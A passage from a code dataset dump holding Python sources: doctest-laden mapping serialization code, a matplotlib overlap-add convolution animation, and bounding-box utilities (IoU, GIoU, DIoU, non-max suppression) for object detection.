-4])])\n +--key_0: datetime.date(1985, 9, 16)\n +--key_1: datetime.date(1980, 3, 17)\n +--value_0: [1, 2, 3, 4]\n | +--0: 1\n | +--1: 2\n | +--2: 3\n | +--3: 4\n +--value_1: [6, 12, -4]\n +--0: 6\n +--1: 12\n +--2: -4\n >>> cstruct = dictify(DateToNumList, example)\n >>> cstruct == {u'1985-09-16':[1,2,3,4], '1980-03-17':[6,12,-4]}\n True\n >>> undictify(DateToNumList, cstruct) == example\n True\n >>> undictify(DateToNumList, None)\n Traceback (most recent call last):\n ...\n Invalid: type_error - Expected dict, got \n >>> validate(DateToNumList, example)\n >>> validate(DateToNumList, {\"not a date\":[1,2,3]})\n Traceback (most recent call last):\n ...\n Invalid: key_0: [type_error]\n >>> validate(DateToNumList, {d1:[1,\"hi\",3]})\n Traceback (most recent call last):\n ...\n Invalid: value_0: [1: [type_error]]\n >>> validate(DateToNumList, 12)\n Traceback (most recent call last):\n ...\n Invalid: type_error - Expected dict, got \n\n >>> try:\n ... undictify(DateToNumList, OrderedDict([\n ... ('1985-09-16', [1, 'hi']),\n ... ('hello', None),\n ... ]))\n ... except Invalid as e:\n ... print(vg.ascii_tree(e.as_graph(), sort=True))\n root: []\n +--key_1: [SingleInvalid('bad_format',)]\n +--value_1: [SingleInvalid('type_error',)]\n\n Caveat: Note that if the value passed in is not an OrderedDict, then there's\n no guarantee of the numerical order of the errors or of the traversal -\n '''\n def of(self, key, val):\n key, val = to_typegraph(key), to_typegraph(val)\n return vg.PlainGraphNode(self, key=key, val=val)\n\n@traverse.when(UniMapping)\ndef traverse_unimap(dispgraph, value, zipgraph=None, **kwargs):\n edges = []\n keygraph = dispgraph['key']\n valgraph = dispgraph['val']\n keyzip = zipgraph['key'] if zipgraph else None\n valzip = zipgraph['val'] if zipgraph else None\n for i, (key, val) in enumerate(value.items()):\n edges.append(('key_{}'.format(i), keygraph(key, keyzip, **kwargs)))\n edges.append(('value_{}'.format(i), valgraph(val, valzip, **kwargs)))\n v = value\n if zipgraph:\n v = (v, zipgraph.value)\n return vg.PlainGraphNode(v, edges)\n\n\n@undictify.when(UniMapping)\ndef undictify_unimap(dispgraph, value, **kwargs):\n if not isinstance(value, dict):\n raise Invalid(\"type_error\", \"Expected dict, got {}\".format(type(value)))\n # If fail_early is True, then gather all errors from this and its\n # children. Otherwise, just raise the first error we encounter.\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n data = {}\n for i, (key, val) in enumerate(value.items()):\n with error_agg.checking_sub('key_{}'.format(i)):\n key = dispgraph['key'](key, **kwargs)\n with error_agg.checking_sub('value_{}'.format(i)):\n val = dispgraph['val'](val, **kwargs)\n data[key] = val\n error_agg.raise_if_any()\n return data\n\n@dictify.when(UniMapping)\ndef dictify_unimap(dispgraph, value, **kwargs):\n kdfy = lambda x: dispgraph['key'](x, **kwargs)\n vdfy = lambda x: dispgraph['val'](x, **kwargs)\n return {kdfy(key):vdfy(val) for (key, val) in value.items()}\n\n@validate.when(UniMapping)\ndef validate_unimap(dispgraph, value, **kwargs):\n if not isinstance(value, dict):\n raise Invalid(\"type_error\", \"Expected dict, got {}\".format(type(value)))\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n for i, (key, val) in enumerate(value.items()):\n with error_agg.checking_sub('key_{}'.format(i)):\n dispgraph['key'](key, **kwargs)\n with error_agg.checking_sub('value_{}'.format(i)):\n dispgraph['val'](val, **kwargs)\n error_agg.raise_if_any()\n\n\n\nif __name__ == '__main__': # pragma: no cover\n import doctest\n doctest.testmod()\n","sub_path":"travesty/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":14066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"398475955","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.signal as sc\nfrom matplotlib.animation import FuncAnimation\nfrom buttons import buttonOnFigure\n#--------------------------------------\nfig = plt.figure()\nfs = 20\nN = 80\nsignalFrec = 0.4\nfirData, = np.load(\"6_clase/low_pass_1k.npy\").astype(float)\nfirData = np.insert(firData,0,firData[-1])\nM = len(firData)\nfirExtendedData = np.concatenate((firData,np.zeros(N-1)))\nimpar = ((N+M-1)%2)\n#--------------------------------------\ndef x(f,n):\n return np.sin(2*np.pi*f*n)+np.sin(2*np.pi*5*n)\n\nk=10\ntData=np.linspace(0,(k*N+M-1)/fs,k*N+M-1,endpoint=False)\nxData=x(signalFrec,tData[:k*N])\nsegment=0\n#--------------------------------------\nsignalAxe = fig.add_subplot(4,1,1)\nsignalLn, = plt.plot(tData[:k*N],xData,'b-o',label=\"signal\")\nsignalAxe.legend()\nsignalAxe.grid(True)\nsignalAxe.set_xlim(0,(k*N-1)/fs)\nsignalAxe.set_ylim(np.min(xData)-0.2,np.max(xData)+0.2)\nconvSignalZoneLn = signalAxe.fill_between([0,0],10,-10,facecolor=\"yellow\",alpha=0.5)\n\ntSegmentData=np.linspace(0,(N+M-1)/fs,N+M-1,endpoint=False)\nfData=np.concatenate((np.linspace(-fs/2,0,(N+M-1)//2,endpoint=False),\\\n np.linspace(0,fs/2,(N+M-1)//2+impar,endpoint=False)))\nsegmentData=np.zeros(N+M-1)\n\n\nfftData=np.fft.fft(xData)\ncircularfftData=np.concatenate((fftData[len(fftData)//2+impar:],fftData[0:len(fftData)//2+impar]))\nsegmentFftAxe = fig.add_subplot(4,2,3)\nsegmentFftLn, = plt.plot([],[],'r-o',label=\"segment FFT\")\nsegmentFftAxe.legend()\nsegmentFftAxe.grid(True)\nsegmentFftAxe.set_xlim(-fs/2,fs/2)\nsegmentFftAxe.set_ylim(np.min(np.abs(fftData)),50)#np.max(fftData))\n\nHData=np.fft.fft(firExtendedData)\ncircularHData=np.concatenate((HData[len(HData)//2+impar:],HData[0:len(HData)//2+impar]))\nHAxe = fig.add_subplot(4,2,5)\nHLn, = plt.plot(fData,np.abs(circularHData),'b-o',label=\"H\")\nHAxe.legend()\nHAxe.grid(True)\nHAxe.set_xlim(-fs/2,fs/2)\nHAxe.set_ylim(np.min(np.abs(HData)),np.max(np.abs(HData)))\n\n\n\nYAxe = fig.add_subplot(4,2,4)\nYLn, = plt.plot([],[],'b-o',label=\"segment Y\")\nYAxe.legend()\nYAxe.grid(True)\nYAxe.set_xlim(-fs/2,fs/2)\nYAxe.set_ylim(np.min(np.abs(fftData)),50)#np.max(fftData))\n\nifftAxe = fig.add_subplot(4,2,6)\nifftLn, = plt.plot([],[],'b-o',label=\"segment ifft\")\nifftAxe.legend()\nifftAxe.grid(True)\nifftAxe.set_xlim(0,(N+M-1)/fs)\nifftAxe.set_ylim(np.min(xData),np.max(xData))\n\nconvAxe = fig.add_subplot(4,1,4)\nconvolveData = np.convolve(xData,firData)\nconvLn, = plt.plot(tData,convolveData,'b-',label = \"conv\")\nrealtimeConvLn, = plt.plot([],[],'g-o')\nconvAxe.legend()\nconvAxe.grid(True)\nconvAxe.set_xlim(0,(k*N+M-2)/fs)\n#--------------------------------------\nrealtimeConv=np.zeros(k*N+M-1)\ndef init():\n global yData,realtimeConv\n# realtimeConv=np.zeros(N+M-1)\n return YLn,realtimeConvLn,convSignalZoneLn,segmentFftLn,ifftLn\n\n\ndef update(i):\n global yData,b,realtimeConv,segment\n segment=i\n\n segmentData[:N]=x(signalFrec,tData[segment*N:(segment+1)*N])\n\n segmentFftData=np.fft.fft(segmentData)\n circularSegmentFftData=np.concatenate((segmentFftData[len(segmentFftData)//2+impar:],segmentFftData[0:len(segmentFftData)//2+impar]))\n segmentFftLn.set_data(fData,np.abs(circularSegmentFftData))\n\n YData=segmentFftData*HData\n YLn.set_data(fData,np.abs(circularSegmentFftData*circularHData))\n\n ifftData=np.fft.ifft(YData)\n ifftLn.set_data(tSegmentData,np.real(ifftData))\n\n realtimeConv[segment*N:segment*N+N+M-1]+=np.real(ifftData)\n realtimeConvLn.set_data(tData,realtimeConv)\n\n convSignalZoneLn = signalAxe.fill_between([tData[segment*N],tData[(segment+1)*N-1]],10,-10,facecolor=\"yellow\",alpha=0.5)\n return YLn,realtimeConvLn,convSignalZoneLn,segmentFftLn,ifftLn\n\nani=FuncAnimation(fig,update,k,init,interval=2000 ,blit=True,repeat=False)\nplt.get_current_fig_manager().window.showMaximized()\nb=buttonOnFigure(fig,ani)\nplt.show()\n","sub_path":"clases/6_clase/overlap_add2.py","file_name":"overlap_add2.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165124631","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport numpy as np\n# import pyximport; pyximport.install()\n# import cython_bbox\n# import cython_nms\nfrom trident.backend.common import *\n\n_session=get_session()\n_backend=_session.backend\n_image_backend=_session.image_backend\n\nif _image_backend=='opencv':\n from trident.backend.opencv_backend import *\nelse:\n from trident.backend.pillow_backend import *\n\nif _backend=='pytorch':\n from trident.backend.pytorch_ops import *\nelse:\n from trident.backend.tensorflow_ops import *\n\n\n\n__all__ = ['nms', 'xywh2xyxy', 'xyxy2xywh','box_area','box_iou','bbox_iou','bbox_diou','box_giou','bbox_giou','bbox_giou_numpy','plot_one_box','convert_to_square']\n\n\ndef plot_one_box(box, img, color=None, label=None, line_thickness=None):\n import cv2\n # Plots one bounding box on image img\n tl = line_thickness if line_thickness is not None else round(0.15*(box[2]-box[0]) )# round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness\n c1, c2 = (int(box[0]), int(box[1])), (int(box[2]), int(box[3]))\n cv2.rectangle(img, c1, c2, color=color, thickness=tl)\n if label:\n tf = max(tl - 1, 1) # font thickness\n t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]\n c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3\n cv2.rectangle(img, c1, c2, color, -1) # filled\n cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)\n return img\n\ndef xywh2xyxy(boxes,image_size=None):\n \"\"\"\n Args:\n boxes (tensor or ndarray):\n boxes with xywh (centerx,centery,width, height) format\n boxes shape should be [n,m] m>=4\n image_size (size): (height, width)\n Returns\n xyxy (x1,y1,x2,y2)\n \"\"\"\n \"\"\"Convert [x1 y1 w h] box format to [x1 y1 x2 y2] format.\"\"\"\n if isinstance(boxes, (list, tuple)):\n # Single box given as a list of coordinates\n assert len(boxes) == 4\n cx, cy ,w,h= boxes[0], boxes[1], boxes[2], boxes[3]\n x1=cx-0.5*w\n y1=cy-0.5*h\n x2 = cx+0.5*w\n y2=cy+0.5*h\n if len(boxes)>4:\n boxlist=[x1, y1, x2, y2]\n boxlist.extend(boxes[4:])\n return np.array(boxlist)\n return np.array([x1, y1, x2, y2])\n elif isinstance(boxes, np.ndarray):\n class_info = None\n if boxes.shape[-1] >4:\n class_info = boxes[:, 4:]\n boxes = boxes[:, :4]\n # Multiple boxes given as a 2D ndarray\n boxes[:, 0:2] =boxes[:, 0:2]- boxes[:, 2:4] / 2\n boxes[:, 2:4] =boxes[:, 2:4] + boxes[:, 0:2]\n\n height, width = np.inf, np.inf\n if image_size is not None:\n height, width = image_size\n boxes[:, :4] = np.round(boxes[:, :4], 0)\n boxes[:, 0] = np.clip(boxes[:, 0], a_min=0, a_max=width)\n boxes[:, 1] = np.clip(boxes[:, 1], a_min=0, a_max=height)\n boxes[:, 2] = np.clip(boxes[:, 2], a_min=0, a_max=width)\n boxes[:, 3] = np.clip(boxes[:, 3], a_min=0, a_max=height)\n if class_info is not None:\n boxes = np.concatenate([boxes, class_info], axis=-1)\n return boxes\n elif is_tensor(boxes) :\n class_info = None\n if boxes.shape[-1] >4:\n class_info = boxes[:, 4:]\n boxes = boxes[:, :4]\n x1y1= clip(round(boxes[:, 0:2] -boxes[:, 2:4] /2,0),0)\n x2y2=clip(round(x1y1+ boxes[:, 2:4],0),0)\n if class_info is not None:\n boxes = concate([x1y1,x2y2, class_info], axis=-1)\n else:\n boxes=concate([x1y1,x2y2],axis=-1)\n return boxes\n\n else:\n raise TypeError('Argument xywh must be a list, tuple, numpy array or tensor.')\n\n\ndef xyxy2xywh(boxes):\n \"\"\"Convert [x1 y1 x2 y2] box format to [x1 y1 w h] format.\"\"\"\n if isinstance(boxes, (list, tuple)):\n # Single box given as a list of coordinates\n assert len(boxes) == 4 or len(boxes) == 5\n x1, y1 = boxes[0], boxes[1]\n w = boxes[2] - x1 + 1\n h = boxes[3] - y1 + 1\n return np.array([x1, y1, w, h])\n elif isinstance(boxes, np.ndarray):\n if boxes.ndim==1:\n boxes=np.expand_dims(boxes,0)\n if boxes.shape[-1]>4:\n return np.concatenate([(boxes[:, 2:4] + boxes[:, 0:2]) / 2, # cx, cy\n boxes[:, 2:4] - boxes[:, 0:2],boxes[:, 4:]], 1) # w, h\n elif boxes.shape[-1]==4:\n return np.concatenate([(boxes[:, 2:4] + boxes[:, 0:2]) / 2, # cx, cy\n boxes[:, 2:4] - boxes[:, 0:2]], 1) # w, h\n elif is_tensor(boxes):\n if boxes.ndim==1:\n boxes=expand_dims(boxes,0)\n if boxes.shape[-1] > 4:\n return concate([(boxes[:, 2:4] + boxes[:, 0:2]) / 2, # cx, cy\n boxes[:, 2:4] - boxes[:, 0:2],boxes[:, 4:]], 1) # w, h\n else:\n return concate([(boxes[:, 2:4] + boxes[:, 0:2])/2, # cx, cy\n boxes[:, 2:4] - boxes[:, 0:2]], 1) # w, h\n else:\n raise TypeError('Argument xyxy must be a list, tuple, or numpy array.')\n\ndef box_area(boxes: Tensor) -> Tensor:\n \"\"\"\n Computes the area of a set of bounding boxes, which are specified by its\n (x1, y1, x2, y2) coordinates.\n\n Arguments:\n boxes (Tensor[N, 4]): boxes for which the area will be computed. They\n are expected to be in (x1, y1, x2, y2) format\n\n Returns:\n area (Tensor[N]): area for each box\n \"\"\"\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])\n\n\ndef box_iou(boxes1, boxes2):\n \"\"\"Calculate the ious between each bbox of bboxes1 and bboxes2.\n\n Args:\n boxes1(ndarray/ tensor): shape (n, 4)\n boxes2(ndarray/ tensor): shape (k, 4)\n\n Returns:\n iou(ndarray/ tensor): shape (n, k)\n union (ndarray/ tensor): shape (n, k)\n\n Examples:\n >>> box_iou(to_tensor(np.array([[104, 85, 200, 157]])).cpu(),to_tensor(np.array([[110, 80, 195, 153]])).cpu())\n (tensor([[0.7878]]), tensor([[7337]]))\n >>> box_iou(np.array([[104, 85, 200, 157]]),np.array([[110, 80, 195, 153]]))\n (array([[7.8779e-01]]), array([[7.3370e+03]]))\n >>> box_iou(to_tensor(np.array([[104, 85, 200, 157]])).cpu(),to_tensor(np.array([[10, 20, 45, 73]])).cpu())\n (tensor([[0.]]), tensor([[8767]]))\n >>> box_iou(np.array([[104, 85, 200, 157]]),np.array([[10, 20, 45, 73]]))\n (array([[0.0000e+00]]), array([[8.7670e+03]]))\n\n \"\"\"\n area1 = box_area(boxes1)\n area2 = box_area(boxes2)\n\n lt = maximum(boxes1[:, None, :2], boxes2[:, :2]) # [N,M,2]\n rb = minimum(boxes1[:, None, 2:], boxes2[:, 2:]) # [N,M,2]\n\n wh = clip(rb- lt,min=0) # [N,M,2]\n inter = wh[:, :, 0] * wh[:, :, 1] # [N,M]\n\n union = area1[:, None] + area2 - inter\n iou = inter / union\n return iou, union\n\nbbox_iou=box_iou\n\n\ndef box_giou(boxes1, boxes2):\n \"\"\"\n Generalized IoU from https://giou.stanford.edu/\n The boxes should be in [x0, y0, x1, y1] format\n Returns a [N, M] pairwise matrix, where N = len(boxes1)\n and M = len(boxes2)\n\n Examples:\n >>> box_giou(to_tensor(np.array([[104, 85, 200, 157]])).cpu(),to_tensor(np.array([[110, 80, 195, 153]])).cpu())\n tensor([[0.7803]])\n >>> box_giou(np.array([[104, 85, 200, 157]]),np.array([[110, 80, 195, 153]]))\n array([[7.8035e-01]])\n >>> box_giou(to_tensor(np.array([[104, 85, 200, 157]])).cpu(),to_tensor(np.array([[10, 20, 45, 73]])).cpu())\n tensor([[-0.6632]])\n >>> box_giou(np.array([[104, 85, 200, 157]]),np.array([[10, 20, 45, 73]]))\n array([[-6.6320e-01]])\n\n \"\"\"\n # degenerate boxes gives inf / nan results\n # so do an early check\n assert (boxes1[:, 2:] >= boxes1[:, :2]).all()\n assert (boxes2[:, 2:] >= boxes2[:, :2]).all()\n iou, union = box_iou(boxes1, boxes2)\n\n lt = minimum(boxes1[:, None, :2], boxes2[:, :2])\n rb =maximum(boxes1[:, None, 2:], boxes2[:, 2:])\n\n wh = clip(rb - lt,min=0) # [N,M,2]\n area = wh[:, :, 0] * wh[:, :, 1]\n\n return iou - (area - union) / area\n\nbbox_giou=box_giou\nbbox_giou_numpy=box_giou\n\ndef clip_boxes_to_image(boxes, size):\n\n \"\"\"\n Clip boxes so that they lie inside an image of size `size`.\n\n Args:\n boxes (Tensor[N, 4]): boxes in (x1, y1, x2, y2) format\n size (Tuple[height, width]): size of the image\n Returns:\n clipped_boxes (Tensor[N, 4])\n\n \"\"\"\n height,width=size\n if len(boxes)>0:\n boxes[:,0]= clip(boxes[:,0],min=0, max=width)\n boxes[:,1]= clip(boxes[:,1],min=0, max=height)\n boxes[:,2]= clip(boxes[:,2],min=0, max=width)\n boxes[:,3]= clip(boxes[:,3],min=0,max=height)\n return boxes\n\n\ndef nms(boxes, threshold):\n \"\"\"\n non max suppression\n\n Args\n box: numpy array n x 5\n input bbox array\n overlap_threshold: float number\n threshold of overlap\n mode: float number\n how to compute overlap ratio, 'Union' or 'Min'\n\n Returns:\n index array of the selected bbox\n \"\"\"\n # if there are no boxes, return an empty list\n\n\n if len(boxes) == 0:\n return []\n\n # initialize the list of picked indexes\n pick = []\n box_len = len(boxes)\n # grab the coordinates of the bounding boxes\n x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]\n\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n\n sorted_index = np.argsort(score)\n # keep looping while some indexes still remain in the indexes list\n adjust_bbox = []\n while len(sorted_index) > 0:\n # grab the last index in the indexes list and add the index value to the list of picked indexes\n last = len(sorted_index) - 1\n i = sorted_index[-1]\n pick.append(int(i))\n sorted_index = sorted_index[:-1]\n if len(sorted_index) == 1:\n break\n # sorted_index = sorted_index[:-1]\n xx1 = np.max(x1[i], x1[sorted_index[:last]])\n yy1 = np.max(y1[i], y1[sorted_index[:last]])\n xx2 = np.min(x2[i], x2[sorted_index[:last]])\n yy2 = np.min(y2[i], y2[sorted_index[:last]])\n # compute the width and height of the bounding box\n xc = ((xx1 + xx2).abs_() / 2 - (x1[sorted_index[:last]] + x2[sorted_index[:last]]) / 2)\n yc = ((yy1 + yy2).abs_() / 2 - (y1[sorted_index[:last]] + y2[sorted_index[:last]]) / 2)\n\n w = (xx2 - xx1 + 1).clamp_(0)\n h = (yy2 - yy1 + 1).clamp_(0)\n inter = w * h\n\n # any of happends will dedup\n IoU = inter / (area[i] + area[sorted_index[:last]] - inter)\n sorted_index = sorted_index[IoU <= threshold]\n\n if boxes is not None and len(pick) > 0:\n try:\n out = boxes[pick]\n if len(out.size()) == 1:\n out = out.unsqueeze(0)\n if len(out) == 0:\n return None\n return out,pick\n except Exception as e:\n print(e)\n print('box_len', box_len)\n print('pick', len(pick))\n print('boxes', len(boxes))\n\n return None\n\n\n\ndef matrix_iou(a, b):\n \"\"\"\n return iou of a and b, numpy version for data augenmentation\n \"\"\"\n lt = np.maximum(a[:, np.newaxis, 0:2], b[:, 0:2])\n rb = np.minimum(a[:, np.newaxis, 2:4], b[:, 2:4])\n\n area_i = np.prod(rb - lt, axis=2) * (lt < rb).all(axis=2)\n area_a = np.prod(a[:, 2:4] - a[:, 0:2], axis=1)\n area_b = np.prod(b[:, 2:4] - b[:, 0:2], axis=1)\n return area_i / (area_a[:, np.newaxis] + area_b - area_i)\n\n\ndef matrix_iof(a, b):\n \"\"\"\n return iof of a and b, numpy version for data augenmentation\n \"\"\"\n lt = np.maximum(a[:, np.newaxis, 0:2], b[:, 0:2])\n rb = np.minimum(a[:, np.newaxis, 2:4], b[:, 2:4])\n\n area_i = np.prod(rb - lt, axis=2) * (lt < rb).all(axis=2)\n area_a = np.prod(a[:, 2:4] - a[:, 0:2], axis=1)\n return area_i / np.maximum(area_a[:, np.newaxis], 1)\n\n\n\n# def bbox_iou(bboxes1, bboxes2, mode='iou', allow_neg=False):\n# \"\"\"Calculate the ious between each bbox of bboxes1 and bboxes2.\n#\n# Args:\n# allow_neg ():\n# bboxes1(ndarray): shape (n, 4)\n# bboxes2(ndarray): shape (k, 4)\n# mode(str): iou (intersection over union) or iof (intersection\n# over foreground)\n#\n# Returns:\n# ious(ndarray): shape (n, k)\n# \"\"\"\n#\n# assert mode in ['iou', 'iof']\n# if (bboxes1 is None or len(bboxes1) == 0) and (bboxes2 is None or len(bboxes2) == 0):\n# return np.ones(1)\n#\n# elif bboxes1 is None or len(bboxes1)==0 or bboxes2 is None or len(bboxes2)==0:\n# return np.zeros(1)\n#\n# bboxes1 = bboxes1.astype(np.float32)\n# bboxes2 = bboxes2.astype(np.float32)\n# rows = bboxes1.shape[0]\n# cols = bboxes2.shape[0]\n# ious = np.zeros((rows, cols), dtype=np.float32)\n# if rows * cols == 0:\n# return ious\n# exchange = False\n# if bboxes1.shape[0] > bboxes2.shape[0]:\n# bboxes1, bboxes2 = bboxes2, bboxes1\n# ious = np.zeros((cols, rows), dtype=np.float32)\n# exchange = True\n# area1 = (bboxes1[:, 2] - bboxes1[:, 0] + 1) * (\n# bboxes1[:, 3] - bboxes1[:, 1] + 1)\n# area2 = (bboxes2[:, 2] - bboxes2[:, 0] + 1) * (\n# bboxes2[:, 3] - bboxes2[:, 1] + 1)\n# for i in range(bboxes1.shape[0]):\n# x_start = np.maximum(bboxes1[i, 0], bboxes2[:, 0])\n# y_start = np.maximum(bboxes1[i, 1], bboxes2[:, 1])\n# x_end = np.minimum(bboxes1[i, 2], bboxes2[:, 2])\n# y_end = np.minimum(bboxes1[i, 3], bboxes2[:, 3])\n# if not allow_neg:\n# overlap = np.maximum(x_end - x_start + 1, 0) * np.maximum(y_end - y_start + 1, 0)\n# else:\n# overlap = (x_end - x_start + 1) * (y_end - y_start + 1)\n# flag = np.ones(overlap.shape)\n# flag[x_end - x_start + 1 < 0] = -1.\n# flag[y_end - y_start + 1 < 0] = -1.\n# overlap = flag * np.abs(overlap)\n#\n# if mode == 'iou':\n# union = area1[i] + area2 - overlap\n# else:\n# union = area1[i] if not exchange else area2\n# ious[i, :] = overlap / union\n# if exchange:\n# ious = ious.T\n# return ious\n\n# def bbox_giou_numpy(bboxes1, bboxes2):\n# \"\"\"Calculate the gious between each bbox of bboxes1 and bboxes2.\n#\n# Args:\n# bboxes1(ndarray): shape (n, 4)\n# bboxes2(ndarray): shape (k, 4)\n#\n# Returns:\n# gious(ndarray): shape (n, k)\n# \"\"\"\n#\n#\n# bboxes1 = bboxes1.astype(np.float32)\n# bboxes2 = bboxes2.astype(np.float32)\n# rows = bboxes1.shape[0]\n# cols = bboxes2.shape[0]\n# ious = np.zeros((rows, cols), dtype=np.float32)\n# if rows * cols == 0:\n# return ious\n# exchange = False\n# if bboxes1.shape[0] > bboxes2.shape[0]:\n# bboxes1, bboxes2 = bboxes2, bboxes1\n# ious = np.zeros((cols, rows), dtype=np.float32)\n# exchange = True\n# area1 = (bboxes1[:, 2] - bboxes1[:, 0] + 1) * (\n# bboxes1[:, 3] - bboxes1[:, 1] + 1)\n# area2 = (bboxes2[:, 2] - bboxes2[:, 0] + 1) * (\n# bboxes2[:, 3] - bboxes2[:, 1] + 1)\n# for i in range(bboxes1.shape[0]):\n# x_start = np.maximum(bboxes1[i, 0], bboxes2[:, 0])\n# x_min = np.minimum(bboxes1[i, 0], bboxes2[:, 0])\n# y_start = np.maximum(bboxes1[i, 1], bboxes2[:, 1])\n# y_min = np.minimum(bboxes1[i, 1], bboxes2[:, 1])\n# x_end = np.minimum(bboxes1[i, 2], bboxes2[:, 2])\n# x_max = np.maximum(bboxes1[i, 2], bboxes2[:, 2])\n# y_end = np.minimum(bboxes1[i, 3], bboxes2[:, 3])\n# y_max = np.maximum(bboxes1[i, 3], bboxes2[:, 3])\n#\n# overlap = np.clip(np.maximum(x_end - x_start + 1, 0) * np.maximum(y_end - y_start + 1, 0),1e-8,np.inf)\n# closure = np.clip(np.maximum(x_max - x_min + 1, 0) * np.maximum(y_max - y_min + 1, 0),1e-8,np.inf)\n#\n# union =np.clip( area1[i] + area2 - overlap,1e-8,np.inf)\n#\n# ious[i, :] = overlap / union - (closure - union) / closure\n# if exchange:\n# ious = ious.T\n# return ious\n\n# def bbox_giou(bboxes1, bboxes2):\n# \"\"\"Calculate GIoU loss on anchor boxes\n# Reference Paper:\n# \"Generalized Intersection over Union: A Metric and A Loss for Bounding Box Regression\"\n# https://arxiv.org/abs/1902.09630\n#\n# Args:\n# bboxes1: tensor, shape=(n, 4), xyxy\n# bboxes2: tensor, shape=(n, 4), xyxy\n#\n# Returns:\n# giou: tensor, shape=(batch, feat_w, feat_h, anchor_num, 1)\n#\n# \"\"\"\n# bboxes1 = bboxes1.float()\n# bboxes2 = bboxes2.float()\n# rows = bboxes1.shape[0]\n# cols = bboxes2.shape[0]\n# # if (bboxes1 is None or len(bboxes1) == 0) and (bboxes2 is None or len(bboxes2) == 0):\n# # return ones((rows, cols))\n# #\n# # elif bboxes1 is None or len(bboxes1)==0 or bboxes2 is None or len(bboxes2)==0:\n# # return zeros((rows, cols))\n# #\n#\n# ious = zeros((rows, cols))\n# ious.requires_grad=True\n# if rows * cols == 0:\n# return ious\n# exchange = False\n# if bboxes1.shape[0] > bboxes2.shape[0]:\n# bboxes1, bboxes2 = bboxes2, bboxes1\n# ious = zeros((cols, rows),requires_grad=True)\n# exchange = True\n# area1 = (bboxes1[:, 2] - bboxes1[:, 0] + 1) * (bboxes1[:, 3] - bboxes1[:, 1] + 1)\n# area2 = (bboxes2[:, 2] - bboxes2[:, 0] + 1) * (bboxes2[:, 3] - bboxes2[:, 1] + 1)\n# for i in range(bboxes1.shape[0]):\n# x_start = maximum(bboxes1[i, 0], bboxes2[:, 0])\n# x_min = minimum(bboxes1[i, 0], bboxes2[:, 0])\n# y_start = maximum(bboxes1[i, 1], bboxes2[:, 1])\n# y_min = minimum(bboxes1[i, 1], bboxes2[:, 1])\n# x_end = minimum(bboxes1[i, 2], bboxes2[:, 2])\n# x_max = maximum(bboxes1[i, 2], bboxes2[:, 2])\n# y_end = minimum(bboxes1[i, 3], bboxes2[:, 3])\n# y_max = maximum(bboxes1[i, 3], bboxes2[:, 3])\n#\n# overlap =clip( maximum(x_end - x_start + 1, 0) * maximum(y_end - y_start + 1, 0),min=1e-8)\n# closure = clip(maximum(x_max - x_min + 1, 0) * maximum(y_max - y_min + 1, 0),min=1e-8)\n#\n# union = clip(area1[i] + area2 - overlap,min=1e-8)\n#\n# ious[i, :] = overlap / union - (closure - union) / closure\n# if exchange:\n# ious = ious.T\n# return ious\n\ndef bbox_diou(bboxes1, bboxes2):\n \"\"\"Calculate DIoU loss on anchor boxes\n Reference Paper:\n \"Distance-IoU Loss: Faster and Better Learning for Bounding Box Regression\"\n https://arxiv.org/abs/1911.08287\n\n Args:\n bboxes1: tensor, shape=(batch, feat_w, feat_h, anchor_num, 4), xywh\n bboxes2: tensor, shape=(batch, feat_w, feat_h, anchor_num, 4), xywh\n\n Returns:\n diou: tensor, shape=(batch, feat_w, feat_h, anchor_num, 1)\n\n \"\"\"\n\n b1_mins = bboxes1[..., :2]\n b1_maxes = bboxes1[..., 2:4]\n b1_wh=b1_maxes-b1_mins\n\n\n b2_mins = bboxes2[..., :2]\n b2_maxes = bboxes2[..., 2:4]\n b2_wh=b2_maxes-b2_mins\n\n intersect_mins = maximum(b1_mins, b2_mins)\n intersect_maxes = minimum(b1_maxes, b2_maxes)\n intersect_wh = maximum(intersect_maxes - intersect_mins, 0.)\n intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]\n\n b1_area = b1_wh[..., 0] * b1_wh[..., 1]\n b2_area = b2_wh[..., 0] * b2_wh[..., 1]\n union_area = b1_area + b2_area - intersect_area\n # calculate IoU, add epsilon in denominator to avoid dividing by 0\n iou = intersect_area / (union_area + epsilon())\n\n # box center distance\n center_distance = reduce_sum(square((b1_maxes+b1_mins)/2 - (b2_maxes+b2_mins)/2), axis=-1)\n # get enclosed area\n enclose_mins = minimum(b1_mins, b2_mins)\n enclose_maxes = maximum(b1_maxes, b2_maxes)\n enclose_wh =maximum(enclose_maxes - enclose_mins, 0.0)\n # get enclosed diagonal distance\n enclose_diagonal = reduce_sum(square(enclose_wh), axis=-1)\n # calculate DIoU, add epsilon in denominator to avoid dividing by 0\n diou = iou - 1.0 * center_distance/ (enclose_diagonal + epsilon())\n\n # calculate param v and alpha to extend to CIoU\n #v = 4*K.square(tf.math.atan2(b1_wh[..., 0], b1_wh[..., 1]) - tf.math.atan2(b2_wh[..., 0], b2_wh[..., 1])) / (math.pi * math.pi)\n #alpha = v / (1.0 - iou + v)\n #diou = diou - alpha*v\n\n diou = expand_dims(diou, -1)\n return diou\n\ndef convert_to_square(bboxes):\n \"\"\"Convert bounding boxes to a square form.\n Args:\n bboxes: a float numpy array of shape [n, 5].\n Returns:\n a float numpy array of shape [n, 5],\n squared bounding boxes.\n\n Examples:\n >>> convert_to_square(to_tensor(np.array([[104, 85, 200, 157]]))).cpu()\n tensor([[104, 73, 200, 169]])\n >>> convert_to_square(np.array([[104, 85, 200, 157]]))\n array([[104, 73, 200, 169]])\n 